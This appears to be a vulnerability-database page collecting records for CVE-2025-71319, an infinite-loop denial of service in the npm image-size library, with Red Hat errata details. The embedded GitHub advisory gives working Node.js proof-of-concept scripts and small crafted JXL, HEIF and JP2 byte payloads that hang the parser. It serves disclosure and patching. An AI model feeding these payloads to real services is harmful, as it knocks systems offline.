[{\"lang\": \"en\", \"value\": \"GENERAL\"}]}, {\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/image-size/image-size\", \"vendor\": \"image-size\", \"product\": \"image-size\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.1.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"1.2.1\"}, {\"status\": \"affected\", \"version\": \"2.0.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"2.0.2\"}], \"packageURL\": \"pkg:npm/image-size\", \"defaultStatus\": \"unaffected\"}], \"datePublic\": \"2025-04-18T00:00:00.000Z\", \"references\": [{\"url\": \"https://joshua.hu/image-size-infinite-loop-dos-vulnerabilities\", \"tags\": [\"technical-description\", \"exploit\"]}, {\"url\": \"https://web.archive.org/web/20260224152152/https://github.com/image-size/image-size/pull/439\", \"tags\": [\"issue-tracking\"]}, {\"url\": \"https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-jxl-heif-parser\", \"tags\": [\"third-party-advisory\"]}], \"x_generator\": {\"engine\": \"vulncheck\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-835\", \"description\": \"Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"83251b91-4cc7-4094-a5c7-464a1b83ea10\", \"shortName\": \"VulnCheck\", \"dateUpdated\": \"2026-06-23T16:13:35.342Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-71319\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-07-10T12:05:42.627Z\", \"dateReserved\": \"2026-06-08T20:44:31.209Z\", \"assignerOrgId\": \"83251b91-4cc7-4094-a5c7-464a1b83ea10\", \"datePublished\": \"2026-06-09T19:57:16.125Z\", \"assignerShortName\": \"VulnCheck\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-71319
Vulnerability from fkie_nvd - Published: 2026-06-09 21:17 - Updated: 2026-07-10 12:167.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Vendor | Product | Version | |
|---|---|---|---|
| image-size | image-size | * |
{
"affected": [
{
"affectedData": [
{
"defaultStatus": "unaffected",
"packageURL": "pkg:npm/image-size",
"product": "image-size",
"repo": "https://github.com/image-size/image-size",
"vendor": "image-size",
"versions": [
{
"lessThanOrEqual": "1.2.1",
"status": "affected",
"version": "1.1.0",
"versionType": "semver"
},
{
"lessThanOrEqual": "2.0.2",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"source": "disclosure@vulncheck.com"
},
{
"affectedData": [
{
"cpes": [
"cpe:/a:redhat:discovery:2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Discovery 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:trusted_artifact_signer:1.4::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Trusted Artifact Signer 1.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:gatekeeper:3"
],
"defaultStatus": "affected",
"product": "Gatekeeper 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:podman_desktop:1"
],
"defaultStatus": "affected",
"product": "Red Hat Build of Podman Desktop",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_fuse:7"
],
"defaultStatus": "unaffected",
"product": "Red Hat Fuse 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7"
],
"defaultStatus": "unaffected",
"product": "Red Hat JBoss Enterprise Application Platform 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8"
],
"defaultStatus": "unaffected",
"product": "Red Hat JBoss Enterprise Application Platform 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jbosseapxp"
],
"defaultStatus": "unaffected",
"product": "Red Hat JBoss Enterprise Application Platform Expansion Pack",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift Dev Spaces",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "unaffected",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
}
],
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:image-size:image-size:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "2C492D20-9B07-48FC-A690-C40D64911E7B",
"versionEndIncluding": "2.0.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [
{
"sourceIdentifier": "disclosure@vulncheck.com",
"tags": [
"unsupported-when-assigned"
]
}
],
"descriptions": [
{
"lang": "en",
"value": "image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application."
}
],
"id": "CVE-2025-71319",
"lastModified": "2026-07-10T12:16:27.627",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "disclosure@vulncheck.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"type": "Secondary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "disclosure@vulncheck.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2025-71319",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "yes"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-10T15:28:34.029349Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-09T21:17:03.153",
"references": [
{
"source": "disclosure@vulncheck.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://joshua.hu/image-size-infinite-loop-dos-vulnerabilities"
},
{
"source": "disclosure@vulncheck.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://web.archive.org/web/20260224152152/https://github.com/image-size/image-size/pull/439"
},
{
"source": "disclosure@vulncheck.com",
"tags": [
"Third Party Advisory"
],
"url": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-jxl-heif-parser"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/security/cve/CVE-2025-71319"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487296"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2025/cve-2025-71319.json"
}
],
"sourceIdentifier": "disclosure@vulncheck.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-835"
}
],
"source": "disclosure@vulncheck.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-835"
}
],
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"type": "Secondary"
}
]
}
GHSA-M5QC-5HW7-8VG7
Vulnerability from github – Published: 2025-04-02 15:04 – Updated: 2026-06-10 17:13Summary
image-size is vulnerable to a Denial of Service vulnerability when processing specially crafted images.
The issue occurs because of an infine loop in findBox when processing certain images with a box with size 0.
Details
If the first bytes of the input does not match any bytes in firstBytes, then the package tries to validate the image using other handlers:
// https://github.com/image-size/image-size/blob/v1.2.0/lib/detector.ts#L20-L31
export function detector(input: Uint8Array): imageType | undefined {
const byte = input[0]
if (byte in firstBytes) {
const type = firstBytes[byte]
if (type && typeHandlers[type].validate(input)) {
return type
}
}
const finder = (key: imageType) => typeHandlers[key].validate(input) //<--
return keys.find(finder)
}
Some handlers that call findBox to validate or calculate the image size are jxl, heif and jp2.
JXL handler calls findBox inside validate. To reach the findBox call, the value at position 4:8 should be 'JXL '
// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jxl.ts#L51-L60
export const JXL: IImage = {
validate: (input: Uint8Array): boolean => {
const boxType = toUTF8String(input, 4, 8)
if (boxType !== 'JXL ') return false //<---
const ftypBox = findBox(input, 'ftyp', 0) //<---
if (!ftypBox) return false
const brand = toUTF8String(input, ftypBox.offset + 8, ftypBox.offset + 12)
return brand === 'jxl '
},
findBox can lead to an infinite loop because the value of box.size is 0, thus the offset variable is not updated. Below relevant code with comments (using one of the PAYLOAD below as example):
// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L33-L37
export const readUInt32BE = (input: Uint8Array, offset = 0) =>
input[offset] * 2 ** 24 + // 0 +
input[offset + 1] * 2 ** 16 + // 0 +
input[offset + 2] * 2 ** 8 + // 0 +
input[offset + 3] // 0
// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L66-L75
function readBox(input: Uint8Array, offset: number) { // offset: 0
if (input.length - offset < 4) return
const boxSize = readUInt32BE(input, offset) // 0
if (input.length - offset < boxSize) return // (8 - 0) < 0 => false
return {
name: toUTF8String(input, 4 + offset, 8 + offset), // 'JXL '
offset, // 0
size: boxSize, // 0
}
}
// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L77-L84
export function findBox(input: Uint8Array, boxName: string, offset: number) { // boxName: 'ftyp', offset: 0
while (offset < input.length) { // 0 < 8 => false
const box = readBox(input, offset) // { name: 'JXL ', offset: 0, size: 0 }
if (!box) break // false
if (box.name === boxName) return box // 'JXL ' === 'ftyp' => false
offset += box.size // offset += 0
}
}
A similar issue occurs for HEIF and JP2 handlers:
- https://github.com/image-size/image-size/blob/v1.2.0/lib/types/heif.ts
- https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jp2.ts
PoC
Usage:
node main.js poc1|poc2
- poc for
image-size@2.0.1
// mkdir 2.0.1
// cd 2.0.1/
// npm i image-size@2.0.1
const {imageSizeFromFile} = require("image-size/fromFile");
const {imageSize} = require("image-size");
const fs = require('fs');
// JXL
const PAYLOAD = new Uint8Array([
0x00, 0x00, 0x00, 0x00, // Box with size 0
0x4A, 0x58, 0x4C, 0x20, // "JXL "
]);
// HEIF
// const PAYLOAD = new Uint8Array([
// 0x00, 0x00, 0x00, 0x00, // Box with size 0
// 0x66, 0x74, 0x79, 0x70, // "ftyp"
// 0x61, 0x76, 0x69, 0x66 // "avif"
// ]);
// JP2
// const PAYLOAD = new Uint8Array([
// 0x00, 0x00, 0x00, 0x00, // Box with size 0
// 0x6A, 0x50, 0x20, 0x20, // "jP "
// ]);
const FILENAME = "./poc.svg"
function createPayload() {
fs.writeFileSync(FILENAME, PAYLOAD);
}
function poc1() {
(async () => {
await imageSizeFromFile(FILENAME)
console.log('Done') // never executed
})();
}
function poc2() {
imageSize(PAYLOAD)
console.log('Done') // never executed
}
const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2
async function run() {
createPayload()
const args = process.argv.slice(2);
const t = args[0];
const poc = pocs.get(t) || poc1;
console.log(`Running poc....`)
await poc();
}
run();
- poc for
image-size@1.2.0
// mkdir 1.2.0
// cd 1.2.0/
// npm i image-size@1.2.0
const sizeOf = require("image-size");
const fs = require('fs');
// JXL
const PAYLOAD = new Uint8Array([
0x00, 0x00, 0x00, 0x00, // Box with size 0
0x4A, 0x58, 0x4C, 0x20, // "JXL "
]);
// HEIF
// const PAYLOAD = new Uint8Array([
// 0x00, 0x00, 0x00, 0x00, // Box with size 0
// 0x66, 0x74, 0x79, 0x70, // "ftyp"
// 0x61, 0x76, 0x69, 0x66 // "avif"
// ]);
// JP2
// const PAYLOAD = new Uint8Array([
// 0x00, 0x00, 0x00, 0x00, // Box with size 0
// 0x6A, 0x50, 0x20, 0x20, // "jP "
// ]);
const FILENAME = "./poc.svg"
function createPayload() {
fs.writeFileSync(FILENAME, PAYLOAD);
}
function poc1() {
sizeOf(FILENAME)
console.log('Done') // never executed
}
function poc2() {
sizeOf(PAYLOAD)
console.log('Done') // never executed
}
const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2
async function run() {
createPayload()
const args = process.argv.slice(2);
const t = args[0];
const poc = pocs.get(t) || poc1;
console.log(`Running poc....`)
await poc();
}
run();
- poc for
image-size@1.1.1
// mkdir 1.1.1
// cd 1.1.1/
// npm i image-size@1.1.1
const sizeOf = require("image-size");
const fs = require('fs');
// HEIF
const PAYLOAD = new Uint8Array([
0x00, 0x00, 0x00, 0x00, // Box with size 0
0x66, 0x74, 0x79, 0x70, // "ftyp"
0x61, 0x76, 0x69, 0x66 // "avif"
]);
const FILENAME = "./poc.svg"
function createPayload() {
fs.writeFileSync(FILENAME, PAYLOAD);
}
function poc1() {
sizeOf(FILENAME)
console.log('Done') // never executed
}
function poc2() {
sizeOf(PAYLOAD)
console.log('Done') // never executed
}
const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2
async function run() {
createPayload()
const args = process.argv.slice(2);
const t = args[0];
const poc = pocs.get(t) || poc1;
console.log(`Running poc....`)
await poc();
}
run();
Impact
Denial of Service
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "image-size"
},
"ranges": [
{
"events": [
{
"introduced": "1.1.0"
},
{
"fixed": "1.2.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "image-size"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-71319"
],
"database_specific": {
"cwe_ids": [
"CWE-770",
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-02T15:04:58Z",
"nvd_published_at": "2026-06-09T21:17:03Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`image-size` is vulnerable to a Denial of Service vulnerability when processing specially crafted images.\n\nThe issue occurs because of an infine loop in `findBox` when processing certain images with a box with size `0`.\n\n\n### Details\n\nIf the first bytes of the input does not match any bytes in `firstBytes`, then the package tries to validate the image using other handlers:\n```js\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/detector.ts#L20-L31\nexport function detector(input: Uint8Array): imageType | undefined {\n const byte = input[0]\n if (byte in firstBytes) {\n const type = firstBytes[byte]\n if (type \u0026\u0026 typeHandlers[type].validate(input)) {\n return type\n }\n }\n\n const finder = (key: imageType) =\u003e typeHandlers[key].validate(input) //\u003c--\n return keys.find(finder)\n}\n```\n\nSome handlers that call `findBox` to validate or calculate the image size are `jxl`, `heif` and `jp2`.\n\n`JXL` handler calls `findBox` inside `validate`. To reach the `findBox` call, the value at position `4:8` should be `\u0027JXL \u0027`\n```js\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jxl.ts#L51-L60\nexport const JXL: IImage = {\n validate: (input: Uint8Array): boolean =\u003e {\n const boxType = toUTF8String(input, 4, 8)\n if (boxType !== \u0027JXL \u0027) return false //\u003c---\n\n const ftypBox = findBox(input, \u0027ftyp\u0027, 0) //\u003c---\n if (!ftypBox) return false\n\n const brand = toUTF8String(input, ftypBox.offset + 8, ftypBox.offset + 12)\n return brand === \u0027jxl \u0027\n },\n```\n\n`findBox` can lead to an infinite loop because the value of `box.size` is `0`, thus the `offset` variable is not updated. Below relevant code with comments (using one of the `PAYLOAD` below as example):\n```js\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L33-L37\nexport const readUInt32BE = (input: Uint8Array, offset = 0) =\u003e\n input[offset] * 2 ** 24 + // 0 +\n input[offset + 1] * 2 ** 16 + // 0 +\n input[offset + 2] * 2 ** 8 + // 0 +\n input[offset + 3] // 0\n\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L66-L75\nfunction readBox(input: Uint8Array, offset: number) { // offset: 0\n if (input.length - offset \u003c 4) return\n const boxSize = readUInt32BE(input, offset) // 0\n if (input.length - offset \u003c boxSize) return // (8 - 0) \u003c 0 =\u003e false\n return {\n name: toUTF8String(input, 4 + offset, 8 + offset), // \u0027JXL \u0027\n offset, // 0\n size: boxSize, // 0\n }\n}\n\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L77-L84\nexport function findBox(input: Uint8Array, boxName: string, offset: number) { // boxName: \u0027ftyp\u0027, offset: 0\n while (offset \u003c input.length) { // 0 \u003c 8 =\u003e false\n const box = readBox(input, offset) // { name: \u0027JXL \u0027, offset: 0, size: 0 }\n if (!box) break // false\n if (box.name === boxName) return box // \u0027JXL \u0027 === \u0027ftyp\u0027 =\u003e false\n offset += box.size // offset += 0\n }\n}\n\n```\n\nA similar issue occurs for `HEIF` and `JP2` handlers:\n- https://github.com/image-size/image-size/blob/v1.2.0/lib/types/heif.ts\n- https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jp2.ts\n\n\n### PoC\n\nUsage:\n```bash\nnode main.js poc1|poc2\n```\n\n- poc for `image-size@2.0.1`\n```js\n// mkdir 2.0.1\n// cd 2.0.1/\n// npm i image-size@2.0.1\nconst {imageSizeFromFile} = require(\"image-size/fromFile\");\nconst {imageSize} = require(\"image-size\");\n\nconst fs = require(\u0027fs\u0027);\n\n// JXL\nconst PAYLOAD = new Uint8Array([\n 0x00, 0x00, 0x00, 0x00, // Box with size 0\n 0x4A, 0x58, 0x4C, 0x20, // \"JXL \"\n]);\n\n// HEIF\n// const PAYLOAD = new Uint8Array([\n// 0x00, 0x00, 0x00, 0x00, // Box with size 0\n// 0x66, 0x74, 0x79, 0x70, // \"ftyp\"\n// 0x61, 0x76, 0x69, 0x66 // \"avif\"\n// ]);\n\n// JP2\n// const PAYLOAD = new Uint8Array([\n// 0x00, 0x00, 0x00, 0x00, // Box with size 0\n// 0x6A, 0x50, 0x20, 0x20, // \"jP \"\n// ]);\n\nconst FILENAME = \"./poc.svg\"\n\nfunction createPayload() {\n fs.writeFileSync(FILENAME, PAYLOAD);\n}\n\nfunction poc1() { \n (async () =\u003e {\n await imageSizeFromFile(FILENAME)\n console.log(\u0027Done\u0027) // never executed\n })();\n}\n\nfunction poc2() {\n imageSize(PAYLOAD)\n console.log(\u0027Done\u0027) // never executed\n}\n\nconst pocs = new Map();\npocs.set(\u0027poc1\u0027, poc1); // node main.js poc1\npocs.set(\u0027poc2\u0027, poc2); // node main.js poc2\n\nasync function run() {\n createPayload()\n const args = process.argv.slice(2);\n const t = args[0];\n const poc = pocs.get(t) || poc1;\n console.log(`Running poc....`)\n await poc();\n}\n\nrun();\n```\n\n- poc for `image-size@1.2.0`\n```js\n// mkdir 1.2.0\n// cd 1.2.0/\n// npm i image-size@1.2.0\nconst sizeOf = require(\"image-size\");\nconst fs = require(\u0027fs\u0027);\n\n// JXL\nconst PAYLOAD = new Uint8Array([\n 0x00, 0x00, 0x00, 0x00, // Box with size 0\n 0x4A, 0x58, 0x4C, 0x20, // \"JXL \"\n]);\n\n// HEIF\n// const PAYLOAD = new Uint8Array([\n// 0x00, 0x00, 0x00, 0x00, // Box with size 0\n// 0x66, 0x74, 0x79, 0x70, // \"ftyp\"\n// 0x61, 0x76, 0x69, 0x66 // \"avif\"\n// ]);\n\n// JP2\n// const PAYLOAD = new Uint8Array([\n// 0x00, 0x00, 0x00, 0x00, // Box with size 0\n// 0x6A, 0x50, 0x20, 0x20, // \"jP \"\n// ]);\n\nconst FILENAME = \"./poc.svg\"\n\nfunction createPayload() {\n fs.writeFileSync(FILENAME, PAYLOAD);\n}\n\nfunction poc1() {\n sizeOf(FILENAME)\n console.log(\u0027Done\u0027) // never executed\n}\n\nfunction poc2() {\n sizeOf(PAYLOAD)\n console.log(\u0027Done\u0027) // never executed\n}\n\nconst pocs = new Map();\npocs.set(\u0027poc1\u0027, poc1); // node main.js poc1\npocs.set(\u0027poc2\u0027, poc2); // node main.js poc2\n\nasync function run() {\n createPayload()\n const args = process.argv.slice(2);\n const t = args[0];\n const poc = pocs.get(t) || poc1;\n console.log(`Running poc....`)\n await poc();\n}\n\nrun();\n```\n\n- poc for `image-size@1.1.1`\n```js\n// mkdir 1.1.1\n// cd 1.1.1/\n// npm i image-size@1.1.1\nconst sizeOf = require(\"image-size\");\nconst fs = require(\u0027fs\u0027);\n\n// HEIF\nconst PAYLOAD = new Uint8Array([\n 0x00, 0x00, 0x00, 0x00, // Box with size 0\n 0x66, 0x74, 0x79, 0x70, // \"ftyp\"\n 0x61, 0x76, 0x69, 0x66 // \"avif\"\n]);\n\nconst FILENAME = \"./poc.svg\"\n\nfunction createPayload() {\n fs.writeFileSync(FILENAME, PAYLOAD);\n}\n\nfunction poc1() {\n sizeOf(FILENAME)\n console.log(\u0027Done\u0027) // never executed\n}\n\nfunction poc2() {\n sizeOf(PAYLOAD)\n console.log(\u0027Done\u0027) // never executed\n}\n\nconst pocs = new Map();\npocs.set(\u0027poc1\u0027, poc1); // node main.js poc1\npocs.set(\u0027poc2\u0027, poc2); // node main.js poc2\n\nasync function run() {\n createPayload()\n const args = process.argv.slice(2);\n const t = args[0];\n const poc = pocs.get(t) || poc1;\n console.log(`Running poc....`)\n await poc();\n}\n\nrun();\n```\n\n\n### Impact\n\nDenial of Service",
"id": "GHSA-m5qc-5hw7-8vg7",
"modified": "2026-06-10T17:13:36Z",
"published": "2025-04-02T15:04:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71319"
},
{
"type": "WEB",
"url": "https://github.com/image-size/image-size/commit/8994131c7c3ee8da1699e04700c95e0e683a0c68"
},
{
"type": "PACKAGE",
"url": "https://github.com/image-size/image-size"
},
{
"type": "WEB",
"url": "https://joshua.hu/image-size-infinite-loop-dos-vulnerabilities"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20260224152152/https://github.com/image-size/image-size/pull/439"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-jxl-heif-parser"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "image-size Denial of Service via Infinite Loop during Image Processing"
}
RHSA-2026:33313
Vulnerability from csaf_redhat - Published: 2026-06-29 22:05 - Updated: 2026-07-10 16:14A flaw was found in the xmllint program distributed by the libxml2 package. A buffer over-read in the xmlHTMLPrintFileContext function in the xmllint.c file may be triggered when a crafted file is processed with the xmllint program using the `--htmlout` command line option, causing an application crash and resulting in a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in GNU Coreutils. The sort utility's begfield() function is vulnerable to a heap buffer under-read. The program may access memory outside the allocated buffer if a user runs a crafted command using the traditional key format. A malicious input could lead to a crash or leak sensitive data.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Workaround
|
|
